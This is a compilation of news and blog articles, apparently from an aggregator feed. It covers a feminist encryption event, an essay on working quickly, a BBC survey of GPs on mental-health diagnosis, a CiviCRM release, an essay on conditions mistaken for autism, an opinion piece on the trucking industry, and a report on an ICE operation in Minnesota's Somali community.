Encryption and Feminism: We’re Bringing The Conversation Online

Internet Exchange
internet.exchangepoint.tech
2025-12-04 15:25:51
A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance....
Original Article
privacy and security

A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.

Encryption and Feminism: We’re Bringing The Conversation Online
Gerda Binder, Hera Hussain, Georgia Bullen, Audrey Hingle, Lucy Purdon, and Mallory Knodel in our MozFest session.

By Audrey Hingle

Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.

In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”

It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.

We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push more broadly for privacy-preserving features like screenshot protection and sender-controlled forwarding.

Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.

And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.

So let’s keep going.

New Virtual Session: Encryption and Feminism: Reimagining Child Safety Without Surveillance

🗓️ Feb 10, 4PM GMT, Online

Whether you joined us at MozFest, couldn’t make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.

Speakers will include Chayn’s Hera Hussain, Superbloom’s Georgia Bullen, Courage Everywhere’s Lucy Purdon, UNICEF’s Gerda Binder, and IX’s Mallory Knodel, Ramma Shahid Cheema and Audrey Hingle.

Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.

We hope you’ll join us!

Related: If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey on which features matter most to people in at-risk contexts.


Hidden Influences: How algorithmic recommenders shape our lives by Dr. Luca Belli

New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.

Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.

Support the Internet Exchange

If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip.

Become A Paid Subscriber


Internet Governance

Digital Rights

Technology for Society

Privacy and Security

Upcoming Events

Careers and Funding Opportunities

United States

Global

What did we miss? Please send us a reply or write to editor@exchangepoint.tech.

Why Speed Matters

Hacker News
lemire.me
2025-12-06 12:46:42
Comments...
Original Article

The one constant that I have observed in my professional life is that people underestimate the need to move fast.

Of course, doing good work takes time. I once spent six months writing a URL parser. But the fact that it took so long is not a feature, it is not a positive, it is a negative.

If everything is slow-moving around you, it is likely not going to be good. To fully make use of your brain, you need to move as close as possible to the speed of your thought.

If I give you two PhD students, one who completed their thesis in two years and one who took eight years… you can be almost certain that the two-year thesis will be much better.

Moving fast does not mean that you complete your projects quickly. Projects have many parts, and getting everything right may take a long time.

Nevertheless, you should move as fast as you can.

For multiple reasons:

1. A common mistake is to spend a lot of time—too much time—on a component of your project that does not matter. I once spent a lot of time building a podcast-like version of a course… only to find out later that students had no interest in the podcast format.

2. You learn by making mistakes. The faster you make mistakes, the faster you learn.

3. Your work degrades, becomes less relevant with time. And if you work slowly, you will be more likely to stick with your slightly obsolete work. You know that professor who spent seven years preparing lecture notes twenty years ago? He is not going to throw them away and start again, as that would be a new seven-year project. So he will keep teaching using aging lecture notes until he retires and someone finally updates the course.

What if you are doing open-heart surgery? Don’t you want someone who spends days preparing and who works slowly? No. You almost surely want the surgeon who does many, many open-heart surgeries. They are very likely to be the best one.

Now stop being so slow. Move!

'Life being stressful is not an illness' – GPs on mental health over-diagnosis

Hacker News
www.bbc.com
2025-12-06 12:06:53
Comments...
Original Article

Catherine Burns, Health correspondent; Vicki Loader, Health producer; and Harriet Agerholm


Hundreds of GPs across England have told the BBC they think mental health problems are being over-diagnosed.

One view commonly held by family doctors, our research suggests, is that society tends to over-medicalise normal life stresses. But they're also concerned about how hard it is to get help for patients with mental health conditions.

Earlier this week, the Health Secretary ordered an independent review into the reasons for a rising demand for mental health, ADHD and autism services in England, and where the gaps in support are.

BBC News sent a questionnaire to more than 5,000 GPs in England asking about their experiences helping patients with mental health concerns. Their responses give an insight into how challenging this issue is for many family doctors.

Of the 752 GPs who took part in our research, 442 said they believed that over-diagnosis is a concern. More said mental health problems were over-diagnosed by a little than over-diagnosed by a lot.

Eighty-one GPs who responded felt that mental health problems were under-diagnosed.

Over-diagnosis of mental health issues was far from their only concern. Many GPs also told us they were worried about a lack of help for patients.

For our questionnaire, GPs answered several questions and were invited to leave anonymous comments.

One of the most common themes to emerge can be summed up in this remark from a GP: "Life being stressful is not an illness."

Another commented: "As a society we seem to have forgotten that life can be tough - a broken heart or grief is painful and normal, and we have to learn to cope."

Yet another argued that giving people labels such as anxiety or depression "over-medicalises life and emotional difficulties", and that this was taking resources away from people with severe needs.

A small number of GPs were strongly critical of some patients. One described them as "dishonest, narcissistic… gaming a system free at point of use."

Overall, one in five adults in England report having a common mental health condition, like anxiety or depression, according to a survey published by NHS England. Rates are even higher in young people. For 16-24 year olds, it's one in four.

The GPs who took part in our research identified 19-34 year olds as the age group who needed the most support with mental health issues.

One commented that young adults "seem to be less resilient since Covid", suggesting they're more concerned with getting a diagnosis than finding coping strategies.

But other GPs said the real issue was under-diagnosis.

"People need to be accepted, helped and encouraged to live life," one said, while another said services were very reluctant "to fully assess and diagnose" patients.

There are almost 40,000 fully-qualified GPs in England and we cannot know if the group who took part in our research is representative of all family doctors.

We asked GPs who had been in the job for at least five years how the amount of time they spend working on mental health has changed. Almost all said it has increased.

The three main reasons they gave for this were:

  • having to support patients who can't get good quality mental health help elsewhere
  • practical issues like housing, employment or finances impacting patients' mental health
  • patients thinking they have a mental health issue, when they're dealing with normal challenges in life

Earlier this year, the health secretary Wes Streeting told the BBC's Laura Kuenssberg that mental health conditions were being over-diagnosed and too many people were being "written off". He now says his comments were "divisive" and that "he failed to capture the complexity of this problem."

It is thought that 2.5 million people in England have ADHD – including those without a diagnosis. Some NHS services for ADHD have closed their doors to new patients because they are struggling to cope with the demand.

Patients have told the BBC about how hard they find it to get proper care and support.

All in all, there's a consensus that the NHS is not meeting rising demand in this area.

A clear majority of GPs who took part in our research, 508 of 752, said there was rarely or never enough good quality mental health help available for adults in their area.

Even more, some 640 GPs, told us they were worried about getting young patients the help they needed.

One GP called mental health support "a national tragedy". Another said: "A child literally needs to be holding a knife to be taken seriously and the second that knife is put down, services disengage."

We also asked GPs if they ever prescribe medication because they worry patients will not get other help, such as talking therapies, quickly enough.

The most common answer - from 447 GPs - is that they do this "routinely".

"I find myself regularly reaching for antidepressants, which I know may only help short term and won't help prevent recurrence," one GP commented.

Professor Victoria Tzortziou Brown, chair of the Royal College of GPs, said there's a "difficult balance" for family doctors to strike when patients expect a diagnosis for mental health problems, but don't meet the criteria.

"We must be careful, as a society, not to medicalise the full range of normal feelings and behaviours and ensure GPs are not pressured into making diagnoses that conflict with their clinical judgement," she said.

"But equally we must avoid dismissing genuine mental health concerns as 'over-diagnosis' which risks discouraging people from seeking help."

The independent review into demand for mental health services has promised to listen to all the evidence and come up with "genuinely useful" recommendations.

Minesh Patel, associate director of policy and influencing at mental health charity Mind, said there was "no credible evidence" that mental health problems were being over-diagnosed.

"What we do know though is that the number of people experiencing mental health problems has increased, with 1 in 5 adults now living with a common mental health condition according to the Adult Psychiatric Morbidity Survey," he said.

Additional reporting by Elena Bailey and Phil Leake.

CiviCRM 6.9 Release

CiviCRM
civicrm.org
2025-12-04 12:01:14
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes. You are encouraged to upgrade now f...
Original Article

Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes.

You are encouraged to upgrade now for the most stable, secure CiviCRM experience:

Download CiviCRM

Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.

Support CiviCRM

CiviCRM is community driven and is sustained through code contributions and generous financial support.

We are committed to keeping CiviCRM free and open, forever. We depend on your support to help make that happen. Please consider supporting CiviCRM today.

Big thanks to all our partners, members, ESR subscribers and contributors who give regularly to support CiviCRM for everyone.

Credits

AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green

New Extensions

  • Membership AJAX Permissions - This CiviCRM extension modifies the API permissions so the API can be called with just the "Access AJAX API" permission instead of requiring the more restrictive default permissions.
  • civiglific - Integrates Glific ( https://glific.org ) with CiviCRM to sync contact groups and send automated WhatsApp messages and receipts to contributors.
  • Reply to Inbound Email - Makes it easier to reply to email, quote the original, etc.

View all latest extensions

Autism's Confusing Cousins

Hacker News
www.psychiatrymargins.com
2025-12-06 11:18:40
Comments...
Original Article

“I think that these days what we mean by “autism” is basically “weird person disease.””

Sorbie Richner, Rich Girl Rehab

“Accurate diagnosis requires consideration of multiple diagnoses. Sometimes, different diagnoses can overlap with one another and can only be differentiated in subtle and nuanced ways, but particular diagnoses vary considerably in levels of public awareness. As such, an individual may meet the diagnostic criteria for one diagnosis but self-diagnoses with a different diagnosis because it is better known.”

Sam Fellowes, Self-Diagnosis in Psychiatry and the Distribution of Social Resources

Unsurprisingly, these days I meet many people in the psychiatric clinic who are convinced that they have autism, or suspect (with various degrees of confidence) that they have autism, or report being diagnosed with autism at some point in their lives by some clinician. And for a fair number of such individuals, I cannot say with reasonable certitude that they have autism. The reasons they give for considering autism vary widely, but tend to be along the lines of…

  • “Eye contact makes me very uncomfortable.”

  • “I suck at small talk.”

  • “I have rigid routines.”

  • “I hyper-focus on my hobbies.”

  • “I am always fidgeting.”

  • “Social interaction exhausts me.”

  • “I’m really bad at making friends.”

  • “I don’t fit in; people find me weird.”

What’s interesting about many of the items above is that the number one diagnostic possibility in my mind is an anxiety disorder of some sort. I remember seeing a woman who was a classic example of someone with high neuroticism, poor self-esteem, and severe social anxiety, and she had believed for much of her life that she was autistic because some random doctor somewhere at some point (she couldn’t even remember who or what sort of assessment this involved) had told her that she had autism, and she believed it because it fit in with her experience of being awkward-shy-weird.

It is common for me to meet individuals who think they have autism and find myself thinking, “schizoid,” “obsessive compulsive,” “cluster B,” “social anxiety,” “generalized anxiety,” “trauma,” “socially awkward,”… None of these, however, have the mimetic virality of autism.

I don’t want to come across as being skeptical of the reality of autism as a diagnosis or as asserting that most people are misdiagnosed. Autism exists, to the extent that any psychiatric disorder exists. Not everyone is misdiagnosed, perhaps not even most people. I am not trying to say, “autism is bullshit.” It’s not. I offer the diagnosis of autism as a clinician perhaps as often as I find myself doubting it.

What intrigues me is that people are drawn to autism as a diagnosis because it seems to offer recognition of something they’ve lived with: they may be deeply awkward, terribly shy, or bad with people, they may struggle with social interactions, they may find other people annoying, other people may find them weird, they may have a hard time connecting to others, they may have been bullied, and they may have directed their loneliness or introversion towards peculiar interests or hobbies. Autism seems to them to capture all that. It seems like an apt and appealing narrative. But autism may also be the only relevant diagnosis they’ve heard of or are familiar with. They haven’t seen any cool TikToks about being schizoid. No one’s offering them quizzes about being schizotypal. A random pediatrician or primary care doc is not going to tell them they have an obsessive-compulsive style of personality. So when some professional doubts that they have “autism,” they see it as a dismissal or rejection of their “lived experience.” Of course, I am weird-anxious-awkward. How can you say otherwise? What they don’t know is that the choice is not between autism or nothing, but rather between autism and about a dozen other diagnostic possibilities.

So for the sake of our collective sanity, let’s consider a few of them…

To be diagnosed with autism spectrum disorder according to DSM-5, a person must have ongoing difficulties in social communication and interaction in all three areas: trouble with back-and-forth social connection, problems with nonverbal communication like eye contact and body language, and difficulty making or keeping friendships. They also must show at least two types of repetitive or restricted behaviors , such as repetitive movements or phrases, needing things to stay the same, having very intense focused interests, or being unusually sensitive (or under-sensitive) to things like sounds, textures, or lights. These patterns must have been present since early childhood (even if they weren’t noticed until later when life got more complicated), lead to substantial impairment in functioning , and can’t simply be explained by intellectual disability (or other psychiatric disorders).

To “have” autism is simply to demonstrate this cluster of characteristics at the requisite level of severity and pervasiveness. It doesn’t mean that the person has a specific type of brain attribute or a specific set of genes that differentiates them from non-autistics. No such internal essence exists for the notion as currently conceptualized.

Autism spectrum is wide enough to have very different prototypes within it. On one end we have profound autism, representing someone with severe autistic traits who is completely dependent on others for care and has substantial intellectual disability or very limited language ability. At the other end, we have successful nerdy individuals with autistic traits and superior intelligence, often seen in science or academia, à la Sheldon Cooper. (Holden Thorp, editor-in-chief of the Science journals and former UNC chancellor, for example, has publicly disclosed his own autism diagnosis.) This wide range is confusing enough on its own, even without considering other conditions that can present with autism-like features.

Autism cannot be identified via medical “tests.” It is identified via clinical information in the form of history, observation, and interaction, and the less information available or the more unreliable the information provided is, the more uncertain we’ll be. To have autism is basically a judgment call that one is a good match to a descriptive prototype. We can get this judgment wrong, and we sometimes do get it wrong. (There is nothing wrong with this fallibility as such, as long as we recognize it. Lives have been built on foundations less sturdy.)

Autism as a category or identity has taken on a life of its own. I am aware that not everyone in the neurodiversity crowd accepts the legitimacy of clinician judgments or clinical criteria as outlined in the diagnostic manuals, such as the DSM and ICD. There are other ways to ground the legitimacy of self-diagnoses, in theoretically virtuous accounts or pragmatic uses , which require distinct considerations of their own; I don’t reject that. But here, I am concerned with autism as a clinical diagnosis and the accuracy of autism understood in terms of alignment with clinical diagnosis. Would competent and knowledgeable clinicians with access to all relevant clinical information concur that the person’s presentation meets diagnostic criteria for autism? If you don’t really care about that, this post is not for you.

Lascaux Cave

Schizoid personality describes people who have little desire for close relationships and prefer solitary activities. Unlike people who are simply shy or socially anxious, individuals with schizoid personality style genuinely don’t find relationships rewarding or necessary. They typically appear emotionally detached or cold, show restricted emotional expression, seem indifferent to praise or criticism, and have few if any close friends or confidants. They often live quietly on the margins of society, pursuing solitary interests or jobs. They keep their inner worlds (which can be quite rich) private and don’t seek emotional intimacy with others.

In autism, social difficulties stem from genuine challenges with processing social information: difficulty reading facial expressions, understanding implied meanings, picking up on social cues, knowing unwritten social rules, etc. In schizoid personality, the person typically understands social conventions but simply isn’t motivated to engage with them. They withdraw from genuine disinterest. Schizoid personality also lacks the additional features of autism (repetitive or restricted behaviors, various sensory sensitivities).

Schizotypal personality describes people who have odd or eccentric beliefs, unusual perceptual experiences, and difficulties with close relationships. Unlike schizoid personality (which involves simple disinterest in relationships), schizotypal includes strange ways of thinking and perceiving the world. People with schizotypal personality might believe in telepathy, feel they have special powers, think random events have special meaning for them personally, or have unusual perceptual experiences (like feeling a presence in the room or hearing whispers). They typically have few close friends, experience social anxiety that doesn’t improve with familiarity, and may appear paranoid or suspicious of others’ motives. Both schizotypal personality and autism can involve social difficulties and odd or eccentric behavior, but in schizotypal personality, the peculiarity comes from magical thinking, paranoid ideas, and perceptual distortions.

Obsessive-compulsive personality describes people who are preoccupied with orderliness, perfectionism, and control. These individuals are rigid rule-followers who want things to be done “the right way,” have difficulty delegating tasks, and get caught up in details and lists to the point where they lose sight of the main goal. They tend to be workaholics who neglect leisure and friendships, are inflexible about matters of morality or ethics, and are often stubborn and controlling. Both obsessive-compulsive personality and autism can involve rigid adherence to routines, rules, and specific ways of doing things. In obsessive-compulsive personality, the inflexibility comes from anxiety about loss of control. The person is trying to, consciously or unconsciously, manage anxiety through control and perfectionism. In autism, the need for sameness and routine serves different functions. It provides predictability in a world that feels confusing or it helps with sensory regulation rather than anxiety-driven perfectionism.

Severe social anxiety is an intense, persistent fear of social situations where a person might be judged, embarrassed, or humiliated. Social anxiety disorder involves overwhelming fear that interferes with daily life. People with this condition worry excessively about saying something stupid, looking foolish, or being rejected. They often avoid social situations entirely, which can lead to isolation, difficulty maintaining employment, and problems forming relationships. Both social anxiety and autism involve social difficulties and withdrawal. Social anxiety usually improves significantly in comfortable, safe environments (like with close family or friends), while autistic social differences tend to be more consistent across all contexts.

Borderline personality disorder involves intense emotional instability, unstable relationships, fear of abandonment, and a shifting sense of self, with people experiencing rapid mood swings and chaotic relationships that alternate between idealization and devaluation of others. While it can resemble autism through social difficulties, emotional dysregulation, rigid thinking, and feeling different from others, the key distinctions are that borderline centers on intense relationship preoccupations and emotional chaos, whereas autism involves genuine difficulty understanding social cues and communication; borderline features rapidly shifting identity and relationship-triggered mood swings, while autism includes stable self-concept, sensory sensitivities, restricted interests, and literal communication that aren’t present in borderline; and borderline symptoms fluctuate dramatically with relationship stability while autistic traits remain consistent across contexts.

Social communication disorder is a condition in DSM-5 where someone has significant, ongoing difficulty using verbal and nonverbal communication appropriately in social contexts. People with social communication disorder struggle with the “pragmatic” aspects of language, that is, knowing how to use language effectively in social situations. They may have trouble understanding when to take turns in conversation, knowing how much detail to give, adjusting their speaking style for different situations, understanding implied meanings or hints, picking up on nonverbal cues like body language and facial expressions, and knowing how to start, maintain, or end conversations naturally. This makes forming friendships and relationships difficult and affects life functioning. The social communication problems in social communication disorder look nearly identical to the “Criterion A” features of autism. However, unlike autism, people with social communication disorder don’t show repetitive behaviors, restricted interests, sensory sensitivities, or the need for sameness and routine.

Social communication disorder is rarely diagnosed in favor of autism primarily because autism provides access to critical services, insurance coverage, educational support, and legal protections that social communication disorder does not reliably offer, creating strong practical incentives for families and clinicians to prefer the autism diagnosis. Additionally, autism has an established evidence base, validated assessment tools, clear intervention protocols, and a large supportive community with a neurodiversity-affirming culture, while social communication disorder has none of these. It has no community, minimal research, no specific treatments, and little professional awareness since it was only introduced in the DSM in 2013. Service delivery, insurance, and educational systems are built entirely around autism rather than social communication disorder, and since both conditions require similar interventions for social-communication difficulties, there’s little practical incentive to make the diagnostic distinction, especially when the boundary between them (whether restricted/repetitive behaviors are truly absent or just subtle) is often unclear and clinicians are often unsure the distinction really matters.

Trauma-related disorders, particularly from early developmental trauma, severe neglect, or disrupted attachment, can mimic autism through social withdrawal and avoidance of eye contact (defensive protection rather than social processing difficulties), communication delays and difficulties (from lack of language exposure or trauma’s impact on brain development), emotional dysregulation and meltdowns (from emotional dysregulation rather than sensory overload), repetitive self-soothing behaviors (anxiety management rather than stimming), sensory sensitivities (hypervigilance rather than sensory processing differences), and rigid need for routine (anxiety-driven safety-seeking rather than cognitive processing style).

Severe early deprivation can create “quasi-autistic” patterns that can be genuinely difficult to distinguish. The critical distinctions are that trauma-related difficulties typically improve significantly in safe, nurturing environments and with adequate psychological treatment, show more variability across contexts (worse with triggers), are tied to identifiable adverse experiences rather than present from earliest infancy, and lack the restricted interests and genuine social communication processing deficits of autism.

Social awkwardness refers to social ineptness without meaningful impairment that falls within what is considered normal or typical human variation. This can be mistaken for autism because both may involve limited friendships, preference for solitude, conversation difficulties, reduced eye contact, and intense interests, particularly fueled by online self-diagnosis culture and broad autism awareness. The key distinctions are that socially awkward individuals understand what they should do socially but find it difficult or uninteresting (versus genuinely not understanding unwritten rules), show significant improvement with practice and maturity, are more comfortable in specific contexts, lack the sensory sensitivities and restricted/repetitive behaviors required for autism diagnosis, and generally achieve life goals despite awkwardness rather than experiencing clinically significant impairment.

Other diagnoses on the differential include: Selective Mutism, Intellectual Disability (without autism), Stereotypic Movement Disorder, Attention-Deficit/Hyperactivity Disorder (ADHD), Schizophrenia Spectrum Disorders, Avoidant Personality Disorder, Attachment Disorders, Generalized Anxiety Disorder, Obsessive-Compulsive Disorder, and Rett Syndrome (a characteristic pattern of developmental regression after initial normal development, typically 6-18 months).

Comorbidity is possible and expected. Someone can be autistic and have maladaptive personality patterns, trauma histories, or anxiety disorders that complicate the presentation. Developmental context, response to relationships, and subjective experiences are all very important in looking beyond the surface presentation to understanding the meaning and functions of behaviors.


How America's "truck-driver shortage" made the industry a hellscape

Hacker News
www.freightwaves.com
2025-12-06 10:53:56
Comments...
Original Article

Over the past few months, I’ve spoken with hundreds of senior executives at America’s largest trucking companies. Nearly all say they only recently discovered the massive influx of foreign drivers and motor carriers. Most assumed the trend was gradual; none realized it was exponential.

Few had ever heard the term “non-domiciled CDL” until this summer or understood how many drivers with little or no real training have flooded the industry. They failed to understand that despite their own investments in upgraded training and compliance efforts in recent years, the smallest operators had been handed a massive gift: the ability to “train” their own truck drivers, with little to no oversight from Federal regulators.

These changes were driven by a long-standing belief—pushed hard by the American Trucking Associations (ATA)—that the U.S. faces a permanent truck-driver shortage. The ATA’s solution was to lobby Congress and FMCSA to lower every barrier to entry, convinced that new drivers would flow to large ATA-member fleets rather than small operators.

That assumption was rooted in an old reality: twenty years ago, only the biggest carriers offered real-time tracking, electronic tendering, and direct shipper relationships. Small carriers and brokers were stuck with phone, fax, and leftover freight.

That world no longer exists.

Fueled by billions in venture capital and private equity, freight brokers have not only caught up on technology—they’ve leapfrogged the large fleets. They offer single-source routing guides, superior automation, and, crucially, no obligation to enforce hours-of-service, speed limiters, or driver-qualification standards. Brokers simply buy the cheapest capacity available.

When the ATA successfully lobbied to dismantle entry barriers, it inadvertently handed the industry to those brokers and to the least-compliant segment of the market.

Key regulatory changes that removed barriers and gutted safety enforcement:

  • 2016 – DOT stops enforcing English-proficiency requirements for CDLs
  • 2018 – ELD mandate implemented; self-certified devices with intentional back doors allow unlimited editing of driving hours
  • 2019 – Non-domiciled CDLs introduced, permitting foreign nationals to obtain U.S. commercial licenses
  • 2022 – Entry-Level Driver Training rule triggers explosion of unaccredited “CDL mills” selling licenses for $500–$1,000 in days with virtually no training

These minimally trained foreign drivers cannot pass the vetting of large, compliant carriers (no work authorization, poor English, zero experience). They end up at small, often foreign-owned fleets that pay 40% below market and routinely run 14–20-hour days using tampered ELDs.

Three additional accelerants turned a bad situation into a catastrophe:

  1. Freight brokers now control ≈⅓ of all loads and often award them to the lowest bidder, pushing spot rates below the cost of legal operation.
  2. The Biden-era immigration surge delivered millions of new arrivals seeking work; foreign-owned fleets recruited aggressively—higher pay than at home, no experience needed, free “housing” in the sleeper berth.
  3. During the COVID freight boom, carriers and brokers offshored hundreds of thousands of dispatch and brokerage jobs. When the Great Freight Recession hit and those positions were eliminated, many laid-off overseas workers used their newfound industry knowledge to orchestrate cargo theft from jurisdictions beyond U.S. law-enforcement reach.

The results are undeniable:

  • Legitimate carriers and drivers can barely break even; trucking has become an economic backwater for motor carriers that follow the rules
  • Cargo theft is now an industrial-scale national-security crisis coordinated by foreign dispatchers and brokers working in concert with foreign-born drivers inside the United States.
  • Despite billions spent on safety technology, fatal truck-involved crashes are up ≈40% since 2014—almost entirely because of untrained, overworked, and inexperienced drivers now operating 80,000-pound rigs.

In short, a well-intentioned but catastrophically naive campaign to “fix the driver shortage” combined with regulatory loopholes, unchecked immigration, technology back doors, and offshoring has fundamentally broken America’s trucking industry in less than a decade—and virtually no one in Washington or in corporate corner offices saw it coming.

U.S. Citizens With Somali Roots Are Carrying Their Passports Amid Minnesota ICE Crackdown

Intercept
theintercept.com
2025-12-06 10:00:00
ICE’s operation against Minnesota’s Somali community is seen not as an immigration raid but as a racist intimidation campaign. The post U.S. Citizens With Somali Roots Are Carrying Their Passports Amid Minnesota ICE Crackdown appeared first on The Intercept....
Original Article

As dozens of agents from U.S. Immigration and Customs Enforcement surged into Minnesota’s Twin Cities this week as part of a federal crackdown targeting the Somali diaspora, it struck fear in the hearts of community members.

It’s not just immigrants, however, who are worried about ICE’s presence. The rhetoric behind the operation — notably racist rants from Donald Trump about Somalis at large — has left legal residents of Somali descent reeling.

“I’ve had a number of people reach out to me who are actually U.S. citizens who are wondering if they can have their citizenship revoked for a traffic ticket, or asking how they can prove their citizenship,” said Linus Chan, the faculty director of the University of Minnesota Law School’s Detainee Rights Clinic. “People are worried about their family and friends and neighbors, but even citizens are worried for themselves.”

“This is absolutely a racist weaponization of ICE against an entire community.”

The operation, announced this week amid a rising tide of vitriol aimed at Minnesota’s Somali diaspora, isn’t likely to result in booming deportations from Minneapolis and Saint Paul. The Somali community is largely made up of American citizens and permanent residents.

“Ultimately this isn’t going to yield results in terms of numbers of arrests or removal of people,” said Ana Pottratz Acosta, who leads the Immigration and Human Rights Clinic at the University of Minnesota Law School. “This is absolutely a racist weaponization of ICE against an entire community.”

Though many Somali residents cannot be legally deported, some community members are at risk. Even in those cases, however, the number of potentially affected immigrants doesn’t accord with the scale of the crackdown.

Take temporary protected status, or TPS, which is bestowed on some refugees in the country. The ICE raids came on the heels of a decision by Trump last month to rescind TPS for Somali residents, effectively depriving them of legal status in the country. While previous moves to rescind TPS for refugee communities have affected hundreds of thousands of refugees from Haiti and Venezuela, the number of Somalis with TPS stood at just 705, according to a congressional report earlier this year. Minnesota Gov. Tim Walz said about 300 Somalis previously receiving protected status are living in Minnesota.

Still, things are tense as reports of ICE raids pop up across the city, according to Luis Argueta, a spokesperson for Monarca Rapid Response, a community group that tracks ICE.

“We’re really feeling it,” Argueta said. “We have cases where ICE is showing up at three or four locations across our Twin Cities.”

Argueta said an observer with Monarca Rapid Response had witnessed an incident in which federal agents grappled with a man of East African descent in front of a house, telling onlookers they were trying to identify the man. In a video of that incident posted to TikTok by MPR, the local NPR affiliate, agents can be heard saying they will release the man if he gives them the information they’re looking for.

“They literally just profiled an East African man.”

“We are identifying who he is,” an agent is heard saying. “We will let you know if there is a warrant.”

Argueta said, “They literally just profiled an East African man.”

According to MPR, the agents left the scene shortly thereafter without anyone in custody. In video captured by a local Fox affiliate showing a similar scene, two men from Somalia were questioned by masked ICE agents before showing their papers and being let go.

And with a dearth of deportable Somalis to detain, ICE agents have been going after Latino immigrants in their stead, Argueta said.

“The rest of the immigrant community in the Twin Cities is on alert,” Argueta said. “It really feels like this administration is going to use whatever narrative that it wants to spin up to justify the damage and the hurt.”

Targeting All Somalis

Minnesota is home to the largest Somali diaspora community in the country, with steady growth since the 1990s, when a civil war drove refugees to the state as part of resettlement programs. In the decades since, Somalis have become a significant minority and a political force, with Democratic Rep. Ilhan Omar as their most visible face.

Omar has been a constant thorn in the side of Trump, who singled her out by name in comments this week justifying the crackdown.

The remarks about Omar were part of escalating rhetoric from the right against Somalis. Last week, Trump made baseless claims in a social media post that “Somalian gangs” were “roving the streets looking for ‘prey.’”

He continued his tirade at a Cabinet meeting on Tuesday, at which he reportedly awoke after dozing off to rage against Somalis, whom he described as “garbage.” Trump spoke of immigrants but also showed little compunction about addressing Somalis at large. Even the New York Times, usually hesitant to directly ascribe bias to right-wing rhetoric, said the “outburst was shocking in its unapologetic bigotry.”

The racist rhetoric from the president and his allies has prompted a sense of “continual pain” in the Somali diaspora, said one community activist, who requested anonymity for fear of retaliation.

“The response from families in the community is one of overwhelming fear, based on what the president is saying,” the activist told The Intercept. “What did our families run to safety for if we’re just going to be attacked in our new home?”

Even in nearby states with significantly smaller Somali populations, the rhetoric has played out in real life, the activist said.

“I was speaking to one young brother in Omaha, Nebraska, who said that the energy had really shifted in that state,” they said. “Even at the local grocery store, he said, people don’t treat him the same. It’s just bias.”

Trump has made anti-immigrant language a centerpiece of his platform since he announced his first run for the White House in 2015. His comments against the Somali community of Minnesota may have been the most specific broadside against a single ethnic group, said Chan.

